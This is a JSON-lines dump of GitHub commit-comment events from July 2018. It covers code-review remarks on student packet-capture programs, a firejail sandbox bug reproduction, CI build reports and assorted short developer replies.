{"id":"8045652849","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"marc0lhw/pcap_test"},"payload":{"comment":{"id":29908617,"position":14,"line":39,"path":"main.cpp","commit_id":"190259ba77b0d142d6f407150e64b179e2f94bfa","created_at":"2018-07-31T17:47:04Z","updated_at":"2018-07-31T17:47:04Z","author_association":"NONE","body":"indent 맞춰 주세요."}},"created_at":"2018-07-31T17:47:04Z"}
{"id":"8045653907","type":"CommitCommentEvent","actor":{"login":"jsparks000"},"repo":{"name":"jsparks000/hello-world"},"payload":{"comment":{"id":29908619,"position":null,"line":null,"path":null,"commit_id":"0e71d5b5c02a0f0b2689ff555113bd523d91c62b","created_at":"2018-07-31T17:47:17Z","updated_at":"2018-07-31T17:47:17Z","author_association":"OWNER","body":"first comment"}},"created_at":"2018-07-31T17:47:17Z"}
{"id":"8045655615","type":"CommitCommentEvent","actor":{"login":"erikswed"},"repo":{"name":"erikswed/android-PlacesAutocompleteTextView"},"payload":{"comment":{"id":29908623,"position":20,"line":102,"path":"demo-app/src/main/java/com/seatgeek/placesautocompletedemo/PlacesAutocompleteActivity.java","commit_id":"d8380373814f2061aca6ff54eeda408ce474453b","created_at":"2018-07-31T17:47:36Z","updated_at":"2018-07-31T17:47:36Z","author_association":"OWNER","body":"get the feeling you have resolved this now..?"}},"created_at":"2018-07-31T17:47:36Z"}
{"id":"8045655789","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"marc0lhw/pcap_test"},"payload":{"comment":{"id":29908624,"position":15,"line":40,"path":"main.cpp","commit_id":"190259ba77b0d142d6f407150e64b179e2f94bfa","created_at":"2018-07-31T17:47:37Z","updated_at":"2018-07-31T17:47:37Z","author_association":"NONE","body":"src mac 출력 및 dst mac 출력하는 루틴을 별도의 함수로 만들어 코드의 중복을 없애 주세요."}},"created_at":"2018-07-31T17:47:37Z"}
{"id":"8045657547","type":"CommitCommentEvent","actor":{"login":"ArminTaheri"},"repo":{"name":"DianaSerra/series-data-prototype"},"payload":{"comment":{"id":29908628,"position":43,"line":43,"path":"src/series/components/BatchImport.js","commit_id":"33b28c86be7bf7a8378761ed8e2d285bd85b22d2","created_at":"2018-07-31T17:47:57Z","updated_at":"2018-07-31T17:47:57Z","author_association":"NONE","body":"^ resolved in slack"}},"created_at":"2018-07-31T17:47:57Z"}
{"id":"8045661713","type":"CommitCommentEvent","actor":{"login":"sysdevbodensee"},"repo":{"name":"RFduino/RFduino"},"payload":{"comment":{"id":29908640,"position":null,"line":null,"path":null,"commit_id":"af450fa2e00d7596fc6d42ad6b9fbc75289eb82a","created_at":"2018-07-31T17:48:43Z","updated_at":"2018-07-31T17:48:43Z","author_association":"NONE","body":"Hello everbody,\r\nfirst of all, this is not the right place for my question but issues seem disabled. I wrote a mail to support of rfdigital one month ago but never got a response. So this is my last idea where i can get help.\r\n\r\n**Are there state of the art communication libaries (I2C + SPI) available somewhere?**\r\n\r\nThe libaries in this repository are at least three years old an heavily outdated. The simplest example code doesn't work! That's not the kind of \"arduino compateble\" that the rfduino website supposes.\r\n\r\nI'm that deep into programming that i feel able to update the libaries myself (but i feel like some important information for that might be hidden in \".a\"-files that are not even readable for me at least). I would greatly appreciate any help about this. \r\n\r\ntldr: I'd relay like to use the rfduino, but due to the fact that many sensors/boards require I2C or SPI communication the rfduino is not useful without working communication libaries.\r\n\r\nCheers,\r\n\r\nJulius"}},"created_at":"2018-07-31T17:48:43Z"}
{"id":"8045661828","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"marc0lhw/pcap_test"},"payload":{"comment":{"id":29908641,"position":65,"line":72,"path":"main.cpp","commit_id":"190259ba77b0d142d6f407150e64b179e2f94bfa","created_at":"2018-07-31T17:48:44Z","updated_at":"2018-07-31T17:48:44Z","author_association":"NONE","body":"응?\r\nIP_header->ip_len\r\n이게 될 리가?\r\n2바이트짜리 데이터이므로 산술 연산(더하기 빼기)을 위해서는 ntohs 호출해 줘야 하는데?"}},"created_at":"2018-07-31T17:48:44Z"}
{"id":"8045662277","type":"CommitCommentEvent","actor":{"login":"drons"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29908644,"position":5,"line":177,"path":"gdal/frmts/rmf/rmfdataset.cpp","commit_id":"730ac94eda1a32c89c1534db8cb4255b818da9b0","created_at":"2018-07-31T17:48:49Z","updated_at":"2018-07-31T17:48:49Z","author_association":"CONTRIBUTOR","body":"I'm think that 'poGDS->nBands' is redundant here.\r\nThe 'sHeader.nBitDepth' is calculated taking into account the number of bands.\r\nIt seems that I need to add additional checks when opening the file."}},"created_at":"2018-07-31T17:48:49Z"}
{"id":"8045663437","type":"CommitCommentEvent","actor":{"login":"kicloud"},"repo":{"name":"authomatic/authomatic"},"payload":{"comment":{"id":29908650,"position":2,"line":2,"path":"examples/gae/showcase/app.yaml","commit_id":"4060585520c70e361cea5f571ada83732be99438","created_at":"2018-07-31T17:49:02Z","updated_at":"2018-07-31T17:49:02Z","author_association":"NONE","body":"4"}},"created_at":"2018-07-31T17:49:02Z"}
{"id":"8045667194","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"marc0lhw/pcap_test"},"payload":{"comment":{"id":29908661,"position":89,"line":82,"path":"main.cpp","commit_id":"190259ba77b0d142d6f407150e64b179e2f94bfa","created_at":"2018-07-31T17:49:44Z","updated_at":"2018-07-31T17:49:44Z","author_association":"NONE","body":"무조건 16바이트가 아니라 min(datalen, 16) 만큼 for문에서 돌도록 하세요."}},"created_at":"2018-07-31T17:49:44Z"}
{"id":"8045669967","type":"CommitCommentEvent","actor":{"login":"shaadibo"},"repo":{"name":"shaadibo/printf"},"payload":{"comment":{"id":29908667,"position":null,"line":null,"path":null,"commit_id":"17dc5b27ff3955ffc2bc334efb788e210f782fac","created_at":"2018-07-31T17:50:16Z","updated_at":"2018-07-31T17:50:16Z","author_association":"OWNER","body":"added files "}},"created_at":"2018-07-31T17:50:16Z"}
{"id":"8045671217","type":"CommitCommentEvent","actor":{"login":"Vincent43"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908669,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T17:50:29Z","updated_at":"2018-07-31T17:50:29Z","author_association":"COLLABORATOR","body":"I can reproduce it with below:\r\n\r\n```\r\n/etc/firejail/default.local\r\ninclude /etc/firejail/whitelist-common.inc\r\ninclude /etc/firejail/disable-xdg.inc\r\n\r\n```\r\n\r\n```\r\n$ firejail\r\nReading profile /etc/firejail/default.profile\r\nReading profile /etc/firejail/default.local\r\nReading profile /etc/firejail/disable-xdg.inc\r\nReading profile /etc/firejail/whitelist-common.inc\r\nReading profile /etc/firejail/disable-common.inc\r\nReading profile /etc/firejail/disable-passwdmgr.inc\r\nReading profile /etc/firejail/disable-programs.inc\r\n** Note: you can use --noprofile to disable default.profile **\r\n\r\nParent pid 28170, child pid 28171\r\nWarning: cleaning all supplementary groups\r\nWarning: cleaning all supplementary groups\r\nWarning: cleaning all supplementary groups\r\ndirectory resolved as \"/Documents\"\r\n***\r\n*** Error: Documents directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Music\"\r\n***\r\n*** Error: Music directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Pictures\"\r\n***\r\n*** Error: Pictures directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\ndirectory resolved as \"Videos\"\r\n***\r\n*** Error: Videos directory was not found in user home.\r\n***     Any files saved by the program, will be lost when the sandbox is closed.\r\n***\r\nWarning: /sbin directory link was not blacklisted\r\nWarning: /usr/sbin directory link was not blacklisted\r\nWarning: cleaning all supplementary groups\r\nWarning: cleaning all supplementary groups\r\nChild process initialized in 142.79 ms\r\n\r\n```"}},"created_at":"2018-07-31T17:50:29Z"}
{"id":"8045676933","type":"CommitCommentEvent","actor":{"login":"zaphod-42"},"repo":{"name":"ControlEverythingCommunity/BME280"},"payload":{"comment":{"id":29908688,"position":null,"line":null,"path":null,"commit_id":"b9cf3042b86809c98fc0132e40f65408b5ca4c84","created_at":"2018-07-31T17:51:34Z","updated_at":"2018-07-31T17:51:34Z","author_association":"CONTRIBUTOR","body":"Solves #1 "}},"created_at":"2018-07-31T17:51:34Z"}
{"id":"8045680117","type":"CommitCommentEvent","actor":{"login":"drons"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29908697,"position":null,"line":null,"path":null,"commit_id":"730ac94eda1a32c89c1534db8cb4255b818da9b0","created_at":"2018-07-31T17:52:10Z","updated_at":"2018-07-31T17:52:10Z","author_association":"CONTRIBUTOR","body":">  I let you do a more appropriate fix if needed\r\n\r\nI will test in more detail."}},"created_at":"2018-07-31T17:52:10Z"}
{"id":"8045681813","type":"CommitCommentEvent","actor":{"login":"hiddenruby"},"repo":{"name":"hiddenruby/pokerubyhack"},"payload":{"comment":{"id":29908703,"position":null,"line":null,"path":null,"commit_id":"84e82d7cc934a74fc65b6f3924f514ba7d65afd2","created_at":"2018-07-31T17:52:28Z","updated_at":"2018-07-31T17:52:28Z","author_association":"OWNER","body":"- Initial README change from pokeruby's\r\n- Build 1.2 by default, use {version}_rev0 to make 1.0\r\n- Remove checksum comparison and associated files\r\n- Initial output file name change from pokeruby's, and make .gba in parent folder\r\n- Remove tile number check from graphics"}},"created_at":"2018-07-31T17:52:28Z"}
{"id":"8045683664","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29908704,"position":null,"line":null,"path":null,"commit_id":"8fca648d3a03613bac79045f25e3f9837724e8d9","created_at":"2018-07-31T17:52:46Z","updated_at":"2018-07-31T17:52:46Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-7](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T17:52:46Z"}
{"id":"8045686901","type":"CommitCommentEvent","actor":{"login":"klarycantone"},"repo":{"name":"erikswed/android-PlacesAutocompleteTextView"},"payload":{"comment":{"id":29908715,"position":20,"line":102,"path":"demo-app/src/main/java/com/seatgeek/placesautocompletedemo/PlacesAutocompleteActivity.java","commit_id":"d8380373814f2061aca6ff54eeda408ce474453b","created_at":"2018-07-31T17:53:22Z","updated_at":"2018-07-31T17:53:22Z","author_association":"NONE","body":"\n\nI need to filter the city you can help me\n\nInviato da Libero Mail per Android Martedì, 31 Luglio 2018, 07:47PM +02:00 da Hans Erik  notifications@github.com :\n\n>get the feeling you have resolved this now..?\n>—\n>You are receiving this because you commented.\n>Reply to this email directly,  view it on GitHub , or  mute the thread ."}},"created_at":"2018-07-31T17:53:22Z"}
{"id":"8045687484","type":"CommitCommentEvent","actor":{"login":"RakyCoder"},"repo":{"name":"RakyCoder/hello-test"},"payload":{"comment":{"id":29908717,"position":3,"line":3,"path":"README.md","commit_id":"b36672eb130bfabf89ececd0e60cafa30fb4eb7f","created_at":"2018-07-31T17:53:28Z","updated_at":"2018-07-31T17:53:28Z","author_association":"OWNER","body":"tajriba  comment"}},"created_at":"2018-07-31T17:53:28Z"}
{"id":"8045689785","type":"CommitCommentEvent","actor":{"login":"oldfly"},"repo":{"name":"marvin-ai/marvin-automl-ui"},"payload":{"comment":{"id":29908726,"position":null,"line":null,"path":null,"commit_id":"c50083dcbf49f419af57ac84d5703f43074aaf59","created_at":"2018-07-31T17:53:54Z","updated_at":"2018-07-31T17:53:54Z","author_association":"MEMBER","body":"@rafaelnovello @wleite \r\nhey guys, im trying to put a new page on navigation route for test, and i got \"404 not found error\".\r\nAm i missing something?\r\n\r\ntks in advance!"}},"created_at":"2018-07-31T17:53:54Z"}
{"id":"8045690063","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29908728,"position":5,"line":206,"path":"api/src/test/java/org/openmrs/module/msfcore/api/MSFCoreServiceTest.java","commit_id":"ae45c53aeac324cdb14ccf317f2ae974afd06bcd","created_at":"2018-07-31T17:53:57Z","updated_at":"2018-07-31T17:53:57Z","author_association":"COLLABORATOR","body":"I have used lombok before and have no problem using it else where here, I\njust think we have no time to rewrite code that's functional, OpenMrs\ngenerally use no generators but I see so reason for us not to use them\nexcept that we will have to highly document our code for easy maintenance.\nI would encourage coding on the OpenMrs way not the jembi way since the\ncode is most likely to be maintained by OpenMrs community\n\nOn Tue, 31 Jul 2018, 17:59 Laura Vignoli <notifications@github.com> wrote:\n\n> @kaweesi <https://github.com/kaweesi> It would be cleaner to use builders\n> in these tests, let's discuss the use of lombok tomorrow?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/ae45c53aeac324cdb14ccf317f2ae974afd06bcd#commitcomment-29905740>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8ikOJTnthfFFqFdCSu1LqxvIDf9Nks5uMHDRgaJpZM4VobKE>\n> .\n>\n"}},"created_at":"2018-07-31T17:53:57Z"}
{"id":"8045694956","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"gkswlgur9707/BOB7_Network"},"payload":{"comment":{"id":29908737,"position":48,"line":48,"path":"pcap_test/main.cpp","commit_id":"e32e8ceb65e8af355a0483f48e464d9d7731b882","created_at":"2018-07-31T17:54:52Z","updated_at":"2018-07-31T17:54:52Z","author_association":"NONE","body":"packet이라는 변수가 IP Header를 가리키게 하는 것은 아래 51 라인 if문 안으로 집어 넣는 게 좋을 것 같습니다."}},"created_at":"2018-07-31T17:54:52Z"}
{"id":"8045696567","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29908740,"position":154,"line":154,"path":"tests/libqos/virtio-9p.c","commit_id":"bf0f401549b261df82014779f9664ff7003d313b","created_at":"2018-07-31T17:55:11Z","updated_at":"2018-07-31T17:55:11Z","author_association":"NONE","body":"Yes, the main difference is that after has a space automatically placed before it, extra_edge_opts has a comma."}},"created_at":"2018-07-31T17:55:11Z"}
{"id":"8045698576","type":"CommitCommentEvent","actor":{"login":"hiddenruby"},"repo":{"name":"hiddenruby/pokerubyhack"},"payload":{"comment":{"id":29908743,"position":null,"line":null,"path":null,"commit_id":"f882670e1a6877db410f27b5e012b79ad9b127ad","created_at":"2018-07-31T17:55:28Z","updated_at":"2018-07-31T17:55:28Z","author_association":"OWNER","body":"- Initial README change from pokeruby's\r\n- Build 1.2 by default, use {version}_rev0 to make 1.0\r\n- Remove checksum comparison and associated files\r\n- Initial output file name change from pokeruby's, and make .gba in parent folder\r\n- Remove tile number check from graphics"}},"created_at":"2018-07-31T17:55:28Z"}
{"id":"8045699866","type":"CommitCommentEvent","actor":{"login":"davidedc"},"repo":{"name":"pabloahb/Algebrite"},"payload":{"comment":{"id":29908747,"position":null,"line":null,"path":null,"commit_id":"94d0da077dc1dd46b0ef4bb126bbc22b7b7c4a13","created_at":"2018-07-31T17:55:41Z","updated_at":"2018-07-31T17:55:41Z","author_association":"NONE","body":"@pabloahb ping"}},"created_at":"2018-07-31T17:55:41Z"}
{"id":"8045701982","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"gkswlgur9707/BOB7_Network"},"payload":{"comment":{"id":29908751,"position":70,"line":70,"path":"pcap_test/main.cpp","commit_id":"e32e8ceb65e8af355a0483f48e464d9d7731b882","created_at":"2018-07-31T17:56:04Z","updated_at":"2018-07-31T17:56:04Z","author_association":"NONE","body":"55~65라인과\r\n68~76라인과\r\n코드 중복이 많은 것 같습니다.\r\n코드 중복을 줄일 수 있는 방법을 고민해 보시기 바랍니다."}},"created_at":"2018-07-31T17:56:04Z"}
{"id":"8045703251","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"gkswlgur9707/BOB7_Network"},"payload":{"comment":{"id":29908756,"position":81,"line":81,"path":"pcap_test/main.cpp","commit_id":"e32e8ceb65e8af355a0483f48e464d9d7731b882","created_at":"2018-07-31T17:56:18Z","updated_at":"2018-07-31T17:56:18Z","author_association":"NONE","body":"indent 좀 맞춰 주세요."}},"created_at":"2018-07-31T17:56:18Z"}
{"id":"8045713360","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908769,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T17:58:10Z","updated_at":"2018-07-31T17:58:10Z","author_association":"COLLABORATOR","body":"Ah, I see what's going on. Let me fix that."}},"created_at":"2018-07-31T17:58:10Z"}
{"id":"8045715021","type":"CommitCommentEvent","actor":{"login":"Mishael78"},"repo":{"name":"pluspeople/pesaPi"},"payload":{"comment":{"id":29908773,"position":null,"line":null,"path":null,"commit_id":"a75bb1a81ae3beeca4d402b853714939aad5c3f4","created_at":"2018-07-31T17:58:29Z","updated_at":"2018-07-31T17:58:29Z","author_association":"NONE","body":"nice stuff bro"}},"created_at":"2018-07-31T17:58:29Z"}
{"id":"8045715677","type":"CommitCommentEvent","actor":{"login":"jvican"},"repo":{"name":"scala/docs.scala-lang"},"payload":{"comment":{"id":29908775,"position":18,"line":18,"path":"_sips/sips/2018-07-31-interpolation-quote-escape.md","commit_id":"56c1e819a459df4867ea6e3e40dfa57b09bf8113","created_at":"2018-07-31T17:58:36Z","updated_at":"2018-07-31T17:58:36Z","author_association":"MEMBER","body":"I think this sentence would read better this way (less confused order of causality): \"There are no lexing rules that process the backslash escape because, by definition, Scala leaves the interpolation handle escape characters as it sees fit. That means that the appearance of `\\\"` terminates the interpolation rather than continue until the escaped closing `\"`.\"\r\n  \r\nAlso note typos in \"scapes\", \"ption\", \"rocess\" and \"nterpolation\"."}},"created_at":"2018-07-31T17:58:36Z"}
{"id":"8045719057","type":"CommitCommentEvent","actor":{"login":"chiraag-nataraj"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29908786,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T17:59:14Z","updated_at":"2018-07-31T17:59:14Z","author_association":"COLLABORATOR","body":"On a side note, I don't think those were doing anything before, since those variables were only parsed in `fs_whitelist.c`."}},"created_at":"2018-07-31T17:59:14Z"}
{"id":"8045720744","type":"CommitCommentEvent","actor":{"login":"rwitzel"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":29908796,"position":4,"line":437,"path":"airflow/config_templates/default_airflow.cfg","commit_id":"233056e0ddcaf3033e95881d5c7a26fc35fa408f","created_at":"2018-07-31T17:59:33Z","updated_at":"2018-07-31T17:59:33Z","author_association":"NONE","body":"Only for new files or for updated files as well? \r\n\r\nRenaming the variable as well?"}},"created_at":"2018-07-31T17:59:33Z"}
{"id":"8045720751","type":"CommitCommentEvent","actor":{"login":"jvican"},"repo":{"name":"scala/docs.scala-lang"},"payload":{"comment":{"id":29908797,"position":82,"line":82,"path":"_sips/sips/2018-07-31-interpolation-quote-escape.md","commit_id":"56c1e819a459df4867ea6e3e40dfa57b09bf8113","created_at":"2018-07-31T17:59:33Z","updated_at":"2018-07-31T17:59:33Z","author_association":"MEMBER","body":"Can we link to the discussion in JIRA/GitHub about this?"}},"created_at":"2018-07-31T17:59:33Z"}
{"id":"8045721832","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"horegi0823/pcap"},"payload":{"comment":{"id":29908803,"position":32,"line":32,"path":"pcap.cpp","commit_id":"39015c0f68dc9d54e79d0be4d7dac1003e2626d2","created_at":"2018-07-31T17:59:45Z","updated_at":"2018-07-31T17:59:45Z","author_association":"NONE","body":"TCP Header의 위치는 IP Header에서 20바이트 고정 크기(sizeof(struct ip))를 더해서 계산하지 말고 IP Header의 headerLength * 4의 값을 더해서 계산해야 합니다."}},"created_at":"2018-07-31T17:59:45Z"}
{"id":"8045722904","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29908806,"position":25,"line":25,"path":"api/src/main/java/org/openmrs/module/msfcore/audit/MSFCoreLog.java","commit_id":"21cb7cc8652ca527768c4fe3282fa71fe424d8d8","created_at":"2018-07-31T17:59:57Z","updated_at":"2018-07-31T17:59:57Z","author_association":"COLLABORATOR","body":"This object is a log, audit just suggests inspection or examination,\nprobably we don't need to keep msfcore prefix\n\nOn Tue, 31 Jul 2018, 16:11 Laura Vignoli <notifications@github.com> wrote:\n\n> @kaweesi <https://github.com/kaweesi> There's no need to start the entity\n> name with MSFCore, we can just call Audit (as per conversation on slack),\n> and the table can be msfcore_audit\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/21cb7cc8652ca527768c4fe3282fa71fe424d8d8#commitcomment-29903847>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8shiHf1Q53S2nVUHcOpHxa6WKjBMks5uMFdpgaJpZM4VoOVy>\n> .\n>\n"}},"created_at":"2018-07-31T17:59:57Z"}
{"id":"8045725938","type":"CommitCommentEvent","actor":{"login":"forkoz"},"repo":{"name":"p3p/Marlin"},"payload":{"comment":{"id":29908815,"position":null,"line":null,"path":null,"commit_id":"b5447f5b71a890144228cb34b9422b19e66d7cde","created_at":"2018-07-31T18:00:28Z","updated_at":"2018-07-31T18:00:28Z","author_association":"NONE","body":"Something like this for the serial port pins:\r\n#if (!defined(SERIAL_PORT) || SERIAL_PORT != 0) && (!defined(SERIAL_PORT_2) || SERIAL_PORT_2 != 0)\r\n  #define P0_02 LPC1768_PIN(PORT(0), PIN( 2), INTERRUPT(1), PWM(0), ADC_CHAN(7))\r\n  #define P0_03 LPC1768_PIN(PORT(0), PIN( 3), INTERRUPT(1), PWM(0), ADC_CHAN(6))\r\n\r\n"}},"created_at":"2018-07-31T18:00:28Z"}
{"id":"8045726972","type":"CommitCommentEvent","actor":{"login":"kenotron"},"repo":{"name":"avitalb/office-ui-fabric-react"},"payload":{"comment":{"id":29908819,"position":5,"line":20,"path":"packages/office-ui-fabric-react/src/components/Label/Label.doc.tsx","commit_id":"640cf0c9ee7efb9979868056592e6f8741efdbb0","created_at":"2018-07-31T18:00:38Z","updated_at":"2018-07-31T18:00:38Z","author_association":"NONE","body":"probably need to be lib/components instead of src/components so we don't accidentally check these generated files in."}},"created_at":"2018-07-31T18:00:38Z"}
{"id":"8045727486","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"horegi0823/pcap"},"payload":{"comment":{"id":29908822,"position":67,"line":67,"path":"pcap.cpp","commit_id":"39015c0f68dc9d54e79d0be4d7dac1003e2626d2","created_at":"2018-07-31T18:00:44Z","updated_at":"2018-07-31T18:00:44Z","author_association":"NONE","body":"printIP라는 함수의 첫번째 인자를 packet으로 하지 말고 iph를 넘기는 것이 더 좋지 않을까요? 아래 printTCP 함수도 동일."}},"created_at":"2018-07-31T18:00:44Z"}
{"id":"8045727617","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29908823,"position":null,"line":null,"path":null,"commit_id":"ec636cf37de00518e081c6771862efcd3a32173c","created_at":"2018-07-31T18:00:45Z","updated_at":"2018-07-31T18:00:45Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#pr-2](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T18:00:45Z"}
{"id":"8045731593","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"horegi0823/pcap"},"payload":{"comment":{"id":29908837,"position":74,"line":74,"path":"pcap.cpp","commit_id":"39015c0f68dc9d54e79d0be4d7dac1003e2626d2","created_at":"2018-07-31T18:01:27Z","updated_at":"2018-07-31T18:01:27Z","author_association":"NONE","body":"패킷의 전체를 출력하지 말고 TCP Data 영역만 출력하도록 하세요."}},"created_at":"2018-07-31T18:01:27Z"}
{"id":"8045732698","type":"CommitCommentEvent","actor":{"login":"Felipe0312"},"repo":{"name":"paulasscavalcante/Site-Mastertech"},"payload":{"comment":{"id":29908839,"position":16,"line":16,"path":"index.html","commit_id":"ed6cb6898dddf901aac8325d97facd1aa1087c31","created_at":"2018-07-31T18:01:40Z","updated_at":"2018-07-31T18:01:40Z","author_association":"NONE","body":"sa"}},"created_at":"2018-07-31T18:01:40Z"}
{"id":"8045733976","type":"CommitCommentEvent","actor":{"login":"karthikms13"},"repo":{"name":"uday1902/ParkingPaymentService"},"payload":{"comment":{"id":29908841,"position":11,"line":11,"path":"src/main/java/devcraft/parking/util/TimeUtils.java","commit_id":"8f72117d6ec9ee972b86def248d318b2e9671818","created_at":"2018-07-31T18:01:54Z","updated_at":"2018-07-31T18:01:54Z","author_association":"NONE","body":"Do we really need the Utils class with static methods? These methods will most likely get used only in one class right"}},"created_at":"2018-07-31T18:01:54Z"}
{"id":"8045733984","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":29908842,"position":20,"line":80,"path":"cmake/modules/FindFlatBuffers.cmake","commit_id":"46527b86db329fdae03607960fa9b8def3b98df7","created_at":"2018-07-31T18:01:54Z","updated_at":"2018-07-31T18:01:54Z","author_association":"NONE","body":"headers should be generated in different directories to isolate components from each other. that was the reason for my weird include hack originally. somehow we need to propagate `CMAKE_CURRENT_BINARY_DIR` from xbmc/cores/RetroPlayer/messages/CMakeLists.txt to the project-wide includes"}},"created_at":"2018-07-31T18:01:54Z"}
{"id":"8045734047","type":"CommitCommentEvent","actor":{"login":"ag88"},"repo":{"name":"runfalk/rivalcfg"},"payload":{"comment":{"id":29908843,"position":null,"line":null,"path":null,"commit_id":"e1e8f465563dfa564c80899e8b530b6620b710bc","created_at":"2018-07-31T18:01:55Z","updated_at":"2018-07-31T18:01:55Z","author_association":"NONE","body":"hi thanks ! it works (in linux) :)"}},"created_at":"2018-07-31T18:01:55Z"}
{"id":"8045735635","type":"CommitCommentEvent","actor":{"login":"bebriuke"},"repo":{"name":"bebriuke/C-sharp-kursai"},"payload":{"comment":{"id":29908847,"position":null,"line":null,"path":null,"commit_id":"7aa3b1349959fb0040bdc4421efe63d5a21ef23e","created_at":"2018-07-31T18:02:14Z","updated_at":"2018-07-31T18:02:14Z","author_association":"OWNER","body":"Nesuprantu, kodėl kartais išsitrina lentelės elementai. Padariau sprendimą -- bet kokio klavišo paspaudimas."}},"created_at":"2018-07-31T18:02:14Z"}
{"id":"8045735856","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29908848,"position":null,"line":null,"path":null,"commit_id":"3e972f46556ff2ace57c4584d01827aa3b61f826","created_at":"2018-07-31T18:02:16Z","updated_at":"2018-07-31T18:02:16Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2959 of 2959 tests passed, 624 test warnings)\n\nMessages:\n\n * 624 tests had: EIO diffs.\n * 545 tests had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e972f46556ff2ace57c4584d01827aa3b61f826-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T18:02:16Z"}
{"id":"8045737060","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29908851,"position":null,"line":null,"path":null,"commit_id":"5b7a1c0deb2baa3d55fb22b6b8a063b3d176f9b1","created_at":"2018-07-31T18:02:30Z","updated_at":"2018-07-31T18:02:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-475](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-475).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-475-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T18:02:30Z"}
{"id":"8045738950","type":"CommitCommentEvent","actor":{"login":"kks32"},"repo":{"name":"cb-geo/mpm"},"payload":{"comment":{"id":29908853,"position":41,"line":78,"path":"include/material/bingham.h","commit_id":"fc40badccf18c345887a3389babc9dd790fd1f83","created_at":"2018-07-31T18:02:51Z","updated_at":"2018-07-31T18:02:51Z","author_association":"CONTRIBUTOR","body":"What's mu?"}},"created_at":"2018-07-31T18:02:51Z"}
